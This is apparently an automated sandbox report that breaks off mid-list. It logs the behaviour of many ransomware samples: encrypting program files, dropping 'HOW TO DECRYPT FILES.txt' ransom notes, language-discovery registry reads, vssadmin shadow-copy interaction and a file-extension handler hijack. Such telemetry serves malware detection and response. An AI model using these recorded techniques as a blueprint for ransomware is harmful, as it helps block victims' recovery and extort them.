Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\REVERSE.DLL Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Stationery\1033\DADSHIRT.GIF Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLSERVER.EXE Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02470U.BMP Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21301_.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSN.ICO Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\AXIS\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSPST32.DLL Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14515_.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SENDTO.DLL Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\TAB_OFF.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\WORDICON.EXE Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files\VideoLAN\VLC\locale\kab\LC_MESSAGES\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ONWordAddin.dll Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_sun.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR24F.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BCSAutogen.dll Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\THMBNAIL.PNG Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File created C:\Program Files (x86)\Internet Explorer\SIGNUP\HOW TO DECRYPT FILES.txt Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSAEXP30.DLL Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14831_.GIF Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SketchPadTestSchema.xml Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBREF.XML Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 52 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.kcwh-89d52e28395a18b9ea9f725c9088ff995ea9a6f87c3b932bbed6b7358967b745.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-8a42a9df4c3c4a37a8e88102be0d701c704ec1d91732e5888af57038da4eb944.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.maok-c7edfb86e2e9b1770a96810c1a4d85224ce47a8cdb0349bd88aba7c347a55f61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Locky.cg-1f6b35baaa7286d029d20d388d1bf2dc3c40a48f7c7b9f80e7e43fcd94b700b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Mbro.rv-c7f06d575001eae8f8395f3a8dfb0b7bc65462e2b55ba00db0d1847647671e0e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Shade.nsd-aac56d25685a1b8536dd5efeff9fbd8845da20693affb33acd67724ae998a6c3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Zerber.eiog-5199401af468000f9bed469384aa62cb3b97b9aca6d0ce82ab9271a5d8cd3a22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Zerber.pef-1a01faa2b4305c864972ad1cd98bdef35551430028ff9ab6d372f5a1aecbacb2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-6ff32a4efb2f282a9f22bb994872d6435050bf2d6bd480af2e63ec8cf6a4b0ef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vssadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.jzoj-aedcadc2caa44191506fee9254e868171078979ed3bc8283c7c825b47431c804.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Shade.nrv-0d0447aff84832ec96d4398b84ae9e77901dac85c160137de4a882f45a41e277.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-1a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Shade.nvk-9ff3732f6bd57d17c4c56e679831bbfd790f92f35872ac5645b31a112bc0cff7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7576 cmd.exe 14408 cmd.exe 14032 cmd.exe 14164 PING.EXE 5444 PING.EXE -
Interacts with shadow copies 3 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4836 vssadmin.exe 4380 vssadmin.exe 2820 vssadmin.exe 2828 vssadmin.exe 12780 vssadmin.exe -
Kills process with taskkill 2 IoCs
pid Process 14252 taskkill.exe 2736 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe" Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\ = "CRYPTED!" Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\DefaultIcon Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8i9eHkHOwWwQlX.exe,0" Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.CryptoTorLocker2015! Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.CryptoTorLocker2015!\ = "PRPASCBHJSZLMOM" Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\PRPASCBHJSZLMOM\shell\open\command Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe -
Opens file in notepad (likely ransom note) 4 IoCs
pid Process 5908 NOTEPAD.EXE 9200 NOTEPAD.EXE 12776 NOTEPAD.EXE 14000 NOTEPAD.EXE -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5444 PING.EXE 14164 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 34 IoCs
pid Process 2320 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 1164 HEUR-Trojan-Ransom.Win32.Generic-1a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392.exe 1708 HEUR-Trojan-Ransom.Win32.Generic-6ff32a4efb2f282a9f22bb994872d6435050bf2d6bd480af2e63ec8cf6a4b0ef.exe 1028 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 1884 HEUR-Trojan-Ransom.Win32.Generic-8a42a9df4c3c4a37a8e88102be0d701c704ec1d91732e5888af57038da4eb944.exe 1644 HEUR-Trojan-Ransom.Win32.Zerber.pef-1a01faa2b4305c864972ad1cd98bdef35551430028ff9ab6d372f5a1aecbacb2.exe 1840 Trojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exe 2940 Trojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exe 2792 Trojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exe 2804 Trojan-Ransom.Win32.Blocker.jzoj-aedcadc2caa44191506fee9254e868171078979ed3bc8283c7c825b47431c804.exe 2684 Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe 2192 Trojan-Ransom.Win32.Blocker.kcwh-89d52e28395a18b9ea9f725c9088ff995ea9a6f87c3b932bbed6b7358967b745.exe 972 Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe 3036 Trojan-Ransom.Win32.Blocker.maok-c7edfb86e2e9b1770a96810c1a4d85224ce47a8cdb0349bd88aba7c347a55f61.exe 2156 Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe 2084 Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe 2944 Trojan-Ransom.Win32.Foreign.ncak-5b54b3cae09a2d8f73d6b25b3f6ffa8fa3be3b134378412a6e8ba47cdbf3d20e.exe 2948 Trojan-Ransom.Win32.Locky.cg-1f6b35baaa7286d029d20d388d1bf2dc3c40a48f7c7b9f80e7e43fcd94b700b1.exe 468 Trojan-Ransom.Win32.Locky.t-240b43dfc2712d7d40312e760bcca5f9c7c259bbfa115c866127027346cb2fa3.exe 1512 Trojan-Ransom.Win32.Mbro.rv-c7f06d575001eae8f8395f3a8dfb0b7bc65462e2b55ba00db0d1847647671e0e.exe 1044 Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe 448 Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe 1836 Trojan-Ransom.Win32.Shade.nrv-0d0447aff84832ec96d4398b84ae9e77901dac85c160137de4a882f45a41e277.exe 1348 Trojan-Ransom.Win32.Shade.nsd-aac56d25685a1b8536dd5efeff9fbd8845da20693affb33acd67724ae998a6c3.exe 1784 Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe 896 Trojan-Ransom.Win32.Shade.nvk-9ff3732f6bd57d17c4c56e679831bbfd790f92f35872ac5645b31a112bc0cff7.exe 1380 Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe 568 Trojan-Ransom.Win32.Spora.fje-1a42ea14d5401a3cb329ddfe64966725c65dd98380b3e1024ac9ede0d61a0472.exe 1532 Trojan-Ransom.Win32.Xorist.ln-f207de9ad9b5ef4d0bce77372f61561d17d4956a64a834472a09758fcf57d33e.exe 1820 Trojan-Ransom.Win32.Zerber.eazv-9268f55183b64bb27af9dd10bcbd518aa346dc56acd87112e7dcc32f632933d6.exe 2276 Trojan-Ransom.Win32.Zerber.eiog-5199401af468000f9bed469384aa62cb3b97b9aca6d0ce82ab9271a5d8cd3a22.exe 2136 Trojan-Ransom.Win32.Zerber.eju-bb8bc614077ef2f9551ae065689d4b82d8eba737279eb03d1838eeceec2c92b6.exe 2344 Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe 2496 VHO-Trojan-Ransom.Win32.ZedoPoo.gen-88fca17d774c55e22a656f6993a6cc44558500c644865e3f8173bda4ed582cd6.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2872 Trojan-Ransom.Win32.Purgen.jm-703b1ea2b0310efdc194b178c777c2e63d5ad1b7f2ac629c01ffa1b36859ba2f.exe 2392 taskmgr.exe 1552 Trojan-Ransom.Win32.Purgen.fg-f6198b9056684c2ba4b716b330385ad078d63c0e8803ab3219c73ae636436182.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 